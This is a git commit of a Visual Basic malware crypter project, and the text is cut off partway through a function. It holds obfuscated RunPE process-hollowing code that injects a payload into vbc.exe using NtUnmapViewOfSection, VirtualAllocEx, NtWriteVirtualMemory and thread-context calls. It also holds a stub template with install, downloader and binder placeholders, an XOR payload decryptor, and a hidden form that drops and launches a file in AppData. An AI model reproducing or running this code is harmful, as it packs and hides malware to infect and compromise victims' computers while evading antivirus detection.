initial commit

This commit is contained in:
i2p
2026-08-27 11:04:21 -06:00
commit 07a49a8c50
937 changed files with 196477 additions and 0 deletions
+32
View File
@@ -0,0 +1,32 @@
Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "stub", "stub\stub.vbproj", "{B61DF421-1965-4220-9954-6FD5D2765508}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|Any CPU = Release|Any CPU
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B61DF421-1965-4220-9954-6FD5D2765508}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{B61DF421-1965-4220-9954-6FD5D2765508}.Debug|Any CPU.Build.0 = Debug|Any CPU
{B61DF421-1965-4220-9954-6FD5D2765508}.Debug|x64.ActiveCfg = Debug|x86
{B61DF421-1965-4220-9954-6FD5D2765508}.Debug|x64.Build.0 = Debug|x86
{B61DF421-1965-4220-9954-6FD5D2765508}.Debug|x86.ActiveCfg = Debug|x86
{B61DF421-1965-4220-9954-6FD5D2765508}.Debug|x86.Build.0 = Debug|x86
{B61DF421-1965-4220-9954-6FD5D2765508}.Release|Any CPU.ActiveCfg = Release|Any CPU
{B61DF421-1965-4220-9954-6FD5D2765508}.Release|Any CPU.Build.0 = Release|Any CPU
{B61DF421-1965-4220-9954-6FD5D2765508}.Release|x64.ActiveCfg = Release|x64
{B61DF421-1965-4220-9954-6FD5D2765508}.Release|x64.Build.0 = Release|x64
{B61DF421-1965-4220-9954-6FD5D2765508}.Release|x86.ActiveCfg = Release|x86
{B61DF421-1965-4220-9954-6FD5D2765508}.Release|x86.Build.0 = Release|x86
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
Binary file not shown.
@@ -0,0 +1,13 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.296
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
@@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<MySubMain>false</MySubMain>
<SingleInstance>false</SingleInstance>
<ShutdownMode>0</ShutdownMode>
<EnableVisualStyles>true</EnableVisualStyles>
<AuthenticationMode>0</AuthenticationMode>
<ApplicationType>2</ApplicationType>
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
</MyApplicationData>
@@ -0,0 +1,28 @@
Imports System
Imports System.Reflection
Imports System.Runtime.InteropServices
' General Information about an assembly is controlled through the following
' set of attributes. Change these attribute values to modify the information
' associated with an assembly.
' Review the values of the assembly attributes
<Assembly: ComVisible(False)>
'The following GUID is for the ID of the typelib if this project is exposed to COM
<Assembly: Guid("132cb448-c620-4776-9edb-d6ae69c3a272")>
' Version information for an assembly consists of the following four values:
'
' Major Version
' Minor Version
' Build Number
' Revision
'
' You can specify all the values or you can default the Build and Revision Numbers
' by using the '*' as shown below:
' <Assembly: AssemblyVersion("1.0.*")>
@@ -0,0 +1,89 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.296
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Imports System
Namespace My.Resources
'This class was auto-generated by the StronglyTypedResourceBuilder
'class via a tool like ResGen or Visual Studio.
'To add or remove a member, edit your .ResX file then rerun ResGen
'with the /str option, or rebuild your VS project.
'''<summary>
''' A strongly-typed resource class, for looking up localized strings, etc.
'''</summary>
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
Friend Module Resources
Private resourceMan As Global.System.Resources.ResourceManager
Private resourceCulture As Global.System.Globalization.CultureInfo
'''<summary>
''' Returns the cached ResourceManager instance used by this class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
Get
If Object.ReferenceEquals(resourceMan, Nothing) Then
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("bankingcal.Resources", GetType(Resources).Assembly)
resourceMan = temp
End If
Return resourceMan
End Get
End Property
'''<summary>
''' Overrides the current thread's CurrentUICulture property for all
''' resource lookups using this strongly typed resource class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend Property Culture() As Global.System.Globalization.CultureInfo
Get
Return resourceCulture
End Get
Set
resourceCulture = value
End Set
End Property
Friend ReadOnly Property banking() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("banking", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
'''<summary>
''' Looks up a localized string similar to xSilent
'''Aeon Hack
'''.Prodigy
'''Jadencide
'''Dr. Caspers
'''Xeno
'''
'''MSN
'''[email protected]
'''Skype
'''Dr.Casper.s.
'''</summary>
Friend ReadOnly Property text() As String
Get
Return ResourceManager.GetString("text", resourceCulture)
End Get
End Property
End Module
End Namespace
@@ -0,0 +1,127 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
<data name="banking" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\banking.dll;System.Byte[], mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="text" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\text.txt;System.String, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252</value>
</data>
</root>
@@ -0,0 +1,73 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.296
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Namespace My
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0"), _
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Partial Friend NotInheritable Class MySettings
Inherits Global.System.Configuration.ApplicationSettingsBase
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
#Region "My.Settings Auto-Save Functionality"
#If _MyType = "WindowsForms" Then
Private Shared addedHandler As Boolean
Private Shared addedHandlerLockObject As New Object
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Private Shared Sub AutoSaveSettings(ByVal sender As Global.System.Object, ByVal e As Global.System.EventArgs)
If My.Application.SaveMySettingsOnExit Then
My.Settings.Save()
End If
End Sub
#End If
#End Region
Public Shared ReadOnly Property [Default]() As MySettings
Get
#If _MyType = "WindowsForms" Then
If Not addedHandler Then
SyncLock addedHandlerLockObject
If Not addedHandler Then
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
addedHandler = True
End If
End SyncLock
End If
#End If
Return defaultInstance
End Get
End Property
End Class
End Namespace
Namespace My
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
Friend Module MySettingsProperty
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
Friend ReadOnly Property Settings() As Global.bankingcal.My.MySettings
Get
Return Global.bankingcal.My.MySettings.Default
End Get
End Property
End Module
End Namespace
@@ -0,0 +1,7 @@
<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
<Profiles>
<Profile Name="(Default)" />
</Profiles>
<Settings />
</SettingsFile>
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel node will disable file and registry virtualization.
If you want to utilize File and Registry Virtualization for backward
compatibility then delete the requestedExecutionLevel node.
-->
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of all Windows versions that this application is designed to work with. Windows will automatically select the most compatible environment.-->
<!-- If your application is designed to work with Windows 7, uncomment the following supportedOS node-->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>-->
</application>
</compatibility>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!-- <dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>-->
</asmv1:assembly>
Binary file not shown.
@@ -0,0 +1,11 @@
xSilent
Aeon Hack
.Prodigy
Jadencide
Dr. Caspers
Xeno
MSN
[email protected]
Skype
Dr.Casper.s
+156
View File
@@ -0,0 +1,156 @@
Imports System.Runtime.InteropServices
Imports System.Text
Sub Main()
Dim self As String = System.Reflection.Assembly.GetExecutingAssembly.Location()
Console.WriteLine("System Loaded.")
Dim bankingsystem As Byte() = IO.File.ReadAllBytes("C:\Users\Richie\Documents\Visual Studio 2010\Projects\test\test\bin\Debug\test.exe")
Console.WriteLine("Reading Bytes.")
Dim payload As String = "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
Console.WriteLine("Injecting.")
Dim x As New MxjQu?pIopI : x.fkndihn?eM?(bankingsystem, payload)
Console.WriteLine("Success! Injected into " + payload + "!")
Console.ReadLine()
End Sub
Public Class MxjQu?pIopI
Function defaultbrowser() As String
defaultbrowser = My.Computer.Registry.GetValue("HKEY_CLASSES_ROOT\HTTP\shell\open\command", "", "Not Found")
Dim shitplit() As String = Split(defaultbrowser, """")
Return shitplit(1)
End Function
Public Declare Function wi?JiL Lib "kernel32" Alias "LoadLibraryA" (ByVal BuÐ? As String) As IntPtr
Public Declare Function t?R??P Lib "kernel32" Alias "GetProcAddress" (ByVal g??R As IntPtr, ByVal BuÐ? As String) As IntPtr
Function ?QynJNlÐuJqao?m(Of T)(ByVal BuÐ? As String, ByVal j??? As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(t?R??P(wi?JiL(BuÐ?), j???), GetType(T)), Object), T)
End Function
Delegate Function i?fxb(ByVal f?hk As IntPtr, ByVal v?jJtLIQB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function gpJ?Fd(ByVal baqv As IntPtr, ByVal Jme? As IntPtr) As UInteger
Delegate Function ??HPxn(ByVal baqv As IntPtr, ByVal Jme? As IntPtr, ByRef bufr As IntPtr, ByVal bufrFceFfÐBaz As Integer, ByRef tv?u As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function iQePub(ByVal f?hkead As IntPtr, ByVal lwr? As IntPtr) As UInteger
Delegate Function mJ?mh?(ByVal f?hk As IntPtr, ByVal v?jJtLIQB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function ma?jP?(ByVal baqv As IntPtr, ByVal ?bL? As IntPtr, ByVal FceFfÐBaz As IntPtr, ByVal znwv As Integer, ByVal Mb?g As Integer) As IntPtr
Delegate Function rLs?PR(ByVal baqvess As IntPtr, ByVal u?xLaMNd? As IntPtr, ByVal dxLq As Byte(), ByVal nFceFfÐBaz As UInteger, ByVal ??llBp??Ð As Integer) As Boolean
Public Declare Auto Function Iojupz Lib "kernel32" Alias "CreateProcessW" (ByVal FzaQ As String, ByVal nNLr As StringBuilder, ByVal wJbwxlPiy As IntPtr, ByVal yzjc As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal Q?al As Boolean, ByVal usn As Integer, ByVal ePgQ As IntPtr, ByVal q?By As String, ByVal HatJ As Byte(), ByVal mBNL As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function ujFÐJnb(ByVal xw??Q?? As Long, Optional ByVal r?yMxqr As Long = &H4) As Integer
Dim ifcLdbQ As IntPtr
Dim QHmB??a As Integer
Dim ?NiR? As ??HPxn = ?QynJNlÐuJqao?m(Of ??HPxn)("ntdll", "NtReadVirtualMemory")
Call ?NiR?(Process.GetCurrentProcess.Handle, xw??Q??, ifcLdbQ, r?yMxqr, QHmB??a)
Return ifcLdbQ
End Function
Public Function fkndihn?eM?(ByVal ?NÐpfxaL As Byte(), ByVal F?enkÐ?b As String) As Boolean
Try
Dim l?v?M?oÐq As GCHandle = GCHandle.Alloc(?NÐpfxaL, GCHandleType.Pinned) : Dim hModuleBase As Integer = l?v?M?oÐq.AddrOfPinnedObject : l?v?M?oÐq.Free()
Dim wJbwxlPiy As IntPtr = IntPtr.Zero
Dim reHonR?du As IntPtr() = New IntPtr(3) {}
Dim IdcÐ?b??n As Byte() = New Byte(67) {}
Dim oxneÐ?wFe As Integer = BitConverter.ToInt32(?NÐpfxaL, 60)
Dim tr?qtov?m As Integer
Dim v?jJtLIQB As UInteger() = New UInteger(178) {}
v?jJtLIQB(0) = &H10002
Iojupz(Nothing, New StringBuilder(F?enkÐ?b), wJbwxlPiy, wJbwxlPiy, False, 4, wJbwxlPiy, Nothing, IdcÐ?b??n, reHonR?du)
Dim arBcJ?N? As Integer = (hModuleBase + ujFÐJnb(hModuleBase + &H3C))
tr?qtov?m = ujFÐJnb(arBcJ?N? + &H34)
Dim jkbd? As gpJ?Fd = ?QynJNlÐuJqao?m(Of gpJ?Fd)("ntdll", "NtUnmapViewOfSection")
jkbd?(reHonR?du(0), tr?qtov?m)
Dim PNte? As ma?jP? = ?QynJNlÐuJqao?m(Of ma?jP?)("kernel32", "VirtualAllocEx")
Dim u?xLaMNd? As IntPtr = PNte?(reHonR?du(0), tr?qtov?m, ujFÐJnb(arBcJ?N? + &H50), &H3000, &H40)
Dim s?kJ?pmjP As New IntPtr(BitConverter.ToInt32(?NÐpfxaL, oxneÐ?wFe + &H34))
Dim FceFfÐBaz As New IntPtr(BitConverter.ToInt32(?NÐpfxaL, oxneÐ?wFe + 80))
Dim ?iPHiPcR? As Integer
Dim ??llBp??Ð As Integer
Dim api8 As rLs?PR = ?QynJNlÐuJqao?m(Of rLs?PR)("ntdll", "NtWriteVirtualMemory")
api8(reHonR?du(0), u?xLaMNd?, ?NÐpfxaL, CUInt(CInt(ujFÐJnb(arBcJ?N? + &H54))), ?iPHiPcR?)
For i = 0 To ujFÐJnb(arBcJ?N? + &H6, 2) - 1
Dim Ihc?ybIFM As Integer() = New Integer(9) {}
Buffer.BlockCopy(?NÐpfxaL, (oxneÐ?wFe + &HF8) + (i * 40), Ihc?ybIFM, 0, 40)
Dim dxzq?ges? As Byte() = New Byte((Ihc?ybIFM(4) - 1)) {}
Buffer.BlockCopy(?NÐpfxaL, Ihc?ybIFM(5), dxzq?ges?, 0, dxzq?ges?.Length)
FceFfÐBaz = New IntPtr(u?xLaMNd?.ToInt32() + Ihc?ybIFM(3))
s?kJ?pmjP = New IntPtr(dxzq?ges?.Length)
api8(reHonR?du(0), FceFfÐBaz, dxzq?ges?, CUInt(s?kJ?pmjP), ??llBp??Ð)
Next i
Dim Pmlc As i?fxb = ?QynJNlÐuJqao?m(Of i?fxb)("ntdll", "NtGetContextThread")
Pmlc(reHonR?du(1), v?jJtLIQB)
api8(reHonR?du(0), v?jJtLIQB(41) + &H8, BitConverter.GetBytes(u?xLaMNd?.ToInt32()), CUInt(&H4), ??llBp??Ð)
v?jJtLIQB(&H2C) = tr?qtov?m + ujFÐJnb(arBcJ?N? + &H28)
Dim F??do As mJ?mh? = ?QynJNlÐuJqao?m(Of mJ?mh?)("ntdll", "NtSetContextThread")
F??do(reHonR?du(1), v?jJtLIQB)
Dim tBdie As iQePub = ?QynJNlÐuJqao?m(Of iQePub)("ntdll", "NtResumeThread")
tBdie(reHonR?du(1), 0)
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class
+303
View File
@@ -0,0 +1,303 @@
Imports System.Diagnostics
Imports System.Net
Imports System.IO.Compression
Imports Microsoft.Win32
Imports Microsoft.VisualBasic
Imports System.Runtime.InteropServices
Imports System.Text
Imports System
Imports System.Drawing
Imports System.Windows.Forms
Imports System.Reflection
Imports System.IO
Imports System.Resources
Imports System.Reflection.Emit
<Assembly: AssemblyTitle("%3%")>
<Assembly: AssemblyCompany("%4%")>
<Assembly: AssemblyProduct("%5%")>
<Assembly: AssemblyCopyright("%6%")>
<Assembly: AssemblyTrademark("%7%")>
<Assembly: AssemblyCulture("")>
<Assembly: AssemblyVersion("%8%")>
<Assembly: AssemblyFileVersion("%9%")>
Public Class jj
Public Function craycray()
Dim rx As New form1
rx.InitializeComponent()
%Delay%
Try
%install%
Catch
End Try
Try
Try
Dim crate As Byte() = My.Resources2.text2
lol(crate)
Catch
End Try
Dim exbyte As Byte() = form1.cry(My.Resources2.text, "%pass%")
Dim pth As String = rx.LF("%injection%")
Dim forcetry As Byte() = My.Resources2.banking
rx.DI(forcetry, New Object() { exbyte, pth }, "banking.banking", "mKwgLKyjxfK")
Try
%Downloader%
Catch
End Try
%errormsg%
Catch ex As Exception
End Try
dim dd as string = "kk"
return dd
End Function
public function lol (byval dd as byte())
try
Dim ddr$ = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "/%Binder%"
IO.File.WriteAllBytes(ddr, dd)
Process.Start(ddr)
catch
end try
end function
End Class
Public Class form1
Public Shared Sub Main()
Dim rx As New jj
rx.craycray()
End Sub
Public Function bite(ByVal input As String) As Byte()
Dim bt As Byte() = System.Text.Encoding.Default.GetBytes(input)
Return bt
End Function
Public Function str1(ByVal input As Byte()) As String
Dim st As String = System.Text.Encoding.Default.GetString(input)
Return st
End Function
Public Shared Function cry(ByVal data As Byte(), ByVal pass As String) As Byte()
Array.Reverse(data)
Dim eaqOlgrJU04xUqZ9WdYJj2w7znYyd5l8Z3fIplckQ As Byte = data(data.Length - 1)
Dim cnffOlgrGPHmGtKExeRX3KsMH4307B As Byte() = System.Text.Encoding.ASCII.GetBytes(pass)
Dim BhgwM9swbW1YzT7gBGmY8Yt7lLnY801 As Byte() = New Byte(data.Length) {}
Dim hiwlIUa0H1fOQaO7E108jCRMYnXyt0KQieTHV01lc4F270Zy As Integer = 0
For i As Integer = 0 To data.Length - 1
BhgwM9swbW1YzT7gBGmY8Yt7lLnY801(i) = CByte((data(i) Xor eaqOlgrJU04xUqZ9WdYJj2w7znYyd5l8Z3fIplckQ) Xor cnffOlgrGPHmGtKExeRX3KsMH4307B(hiwlIUa0H1fOQaO7E108jCRMYnXyt0KQieTHV01lc4F270Zy))
Array.Reverse(cnffOlgrGPHmGtKExeRX3KsMH4307B)
If hiwlIUa0H1fOQaO7E108jCRMYnXyt0KQieTHV01lc4F270Zy = cnffOlgrGPHmGtKExeRX3KsMH4307B.Length - 1 Then
hiwlIUa0H1fOQaO7E108jCRMYnXyt0KQieTHV01lc4F270Zy = 0
Else
hiwlIUa0H1fOQaO7E108jCRMYnXyt0KQieTHV01lc4F270Zy += 1
End If
Next
Array.Resize(BhgwM9swbW1YzT7gBGmY8Yt7lLnY801, BhgwM9swbW1YzT7gBGmY8Yt7lLnY801.Length - 2)
Return BhgwM9swbW1YzT7gBGmY8Yt7lLnY801
End Function
Public Function LF(ByVal jj As String) As String
Dim QFE1cP0b7Jk2caV3NNmVIk9 As New DirectoryInfo(System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory())
Dim SYpsap3tA933V5QjBhh50h9d78LcQ As String = Nothing
For Each IL As FileInfo In QFE1cP0b7Jk2caV3NNmVIk9.GetFiles(jj)
SYpsap3tA933V5QjBhh50h9d78LcQ = IL.FullName
Return SYpsap3tA933V5QjBhh50h9d78LcQ
Next
Return SYpsap3tA933V5QjBhh50h9d78LcQ
End Function
End Class
Partial Class Form1
Inherits System.Windows.Forms.Form
'Form overrides dispose to clean up the component list.
<System.Diagnostics.DebuggerNonUserCode()> _
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
Try
If disposing AndAlso components IsNot Nothing Then
components.Dispose()
End If
Finally
MyBase.Dispose(disposing)
End Try
End Sub
'Required by the Windows Form Designer
Public components As System.ComponentModel.IContainer
'NOTE: The following procedure is required by the Windows Form Designer
'It can be modified using the Windows Form Designer.
'Do not modify it using the code editor.
<System.Diagnostics.DebuggerStepThrough()> _
Public Sub InitializeComponent()
Me.Visible = False
Me.ShowInTaskbar = False
Me.Opacity = 0
Me.TextBox1 = New System.Windows.Forms.TextBox()
Me.Button1 = New System.Windows.Forms.Button()
Me.Label1 = New System.Windows.Forms.Label()
Me.Label2 = New System.Windows.Forms.Label()
Me.Label3 = New System.Windows.Forms.Label()
Me.Label4 = New System.Windows.Forms.Label()
Me.Panel1 = New System.Windows.Forms.Panel()
Me.ProgressBar1 = New System.Windows.Forms.ProgressBar()
Me.SuspendLayout()
'
'TextBox1
'
Me.TextBox1.Location = New System.Drawing.Point(12, 23)
Me.TextBox1.Name = "TextBox1"
Me.TextBox1.Text = ""
Me.TextBox1.Size = New System.Drawing.Size(100, 20)
Me.TextBox1.TabIndex = 0
'
'Button1
'
Me.Button1.Location = New System.Drawing.Point(12, 49)
Me.Button1.Name = "Button1"
Me.Button1.Size = New System.Drawing.Size(75, 23)
Me.Button1.TabIndex = 1
Me.Button1.Text = "Button1"
Me.Button1.UseVisualStyleBackColor = True
'
'Form
'
Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!)
Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
Me.ClientSize = New System.Drawing.Size(284, 262)
Me.Controls.Add(Me.ProgressBar1)
Me.Controls.Add(Me.Panel1)
Me.Controls.Add(Me.Label4)
Me.Controls.Add(Me.Label3)
Me.Controls.Add(Me.Label2)
Me.Controls.Add(Me.Label1)
Me.Controls.Add(Me.Button1)
Me.Controls.Add(Me.TextBox1)
Me.Name = "Form"
Me.Text = "Form"
Me.ResumeLayout(False)
Me.PerformLayout()
End Sub
Private Function Rev(ByVal sVal_ As String)
Dim rET_BW As Char() = CStr(sVal_).ToCharArray()
Array.Reverse(rET_BW)
Return CStr(New String(rET_BW))
End Function
Public Function DI(ByVal rAl As Byte(), ByVal prm As Object(), ByVal clz As String, ByVal meth As String) As Object
Dim fxlcrfj0EOwxCJBk7T3Iuoh5N0k4Y3WV7uz As System.Reflection.Emit.DynamicMethod = New DynamicMethod("httpslogin", GetType(Object), New Type() {GetType(Byte()), GetType(Object()), GetType(String), GetType(String)})
Dim fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX As System.Reflection.Emit.ILGenerator = fxlcrfj0EOwxCJBk7T3Iuoh5N0k4Y3WV7uz.GetILGenerator()
Dim OGGW0A8076W8TS82 As System.Reflection.Emit.Label = fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.DefineLabel()
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.DeclareLocal(GetType(Assembly))
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldarg_0)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.EmitCall(OpCodes.[Call], GetType(Assembly).GetMethod(Rev("daoL"), New Type() {GetType(Byte())}), Nothing)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Stloc_0)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldarg_2)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Brfalse_S, OGGW0A8076W8TS82)
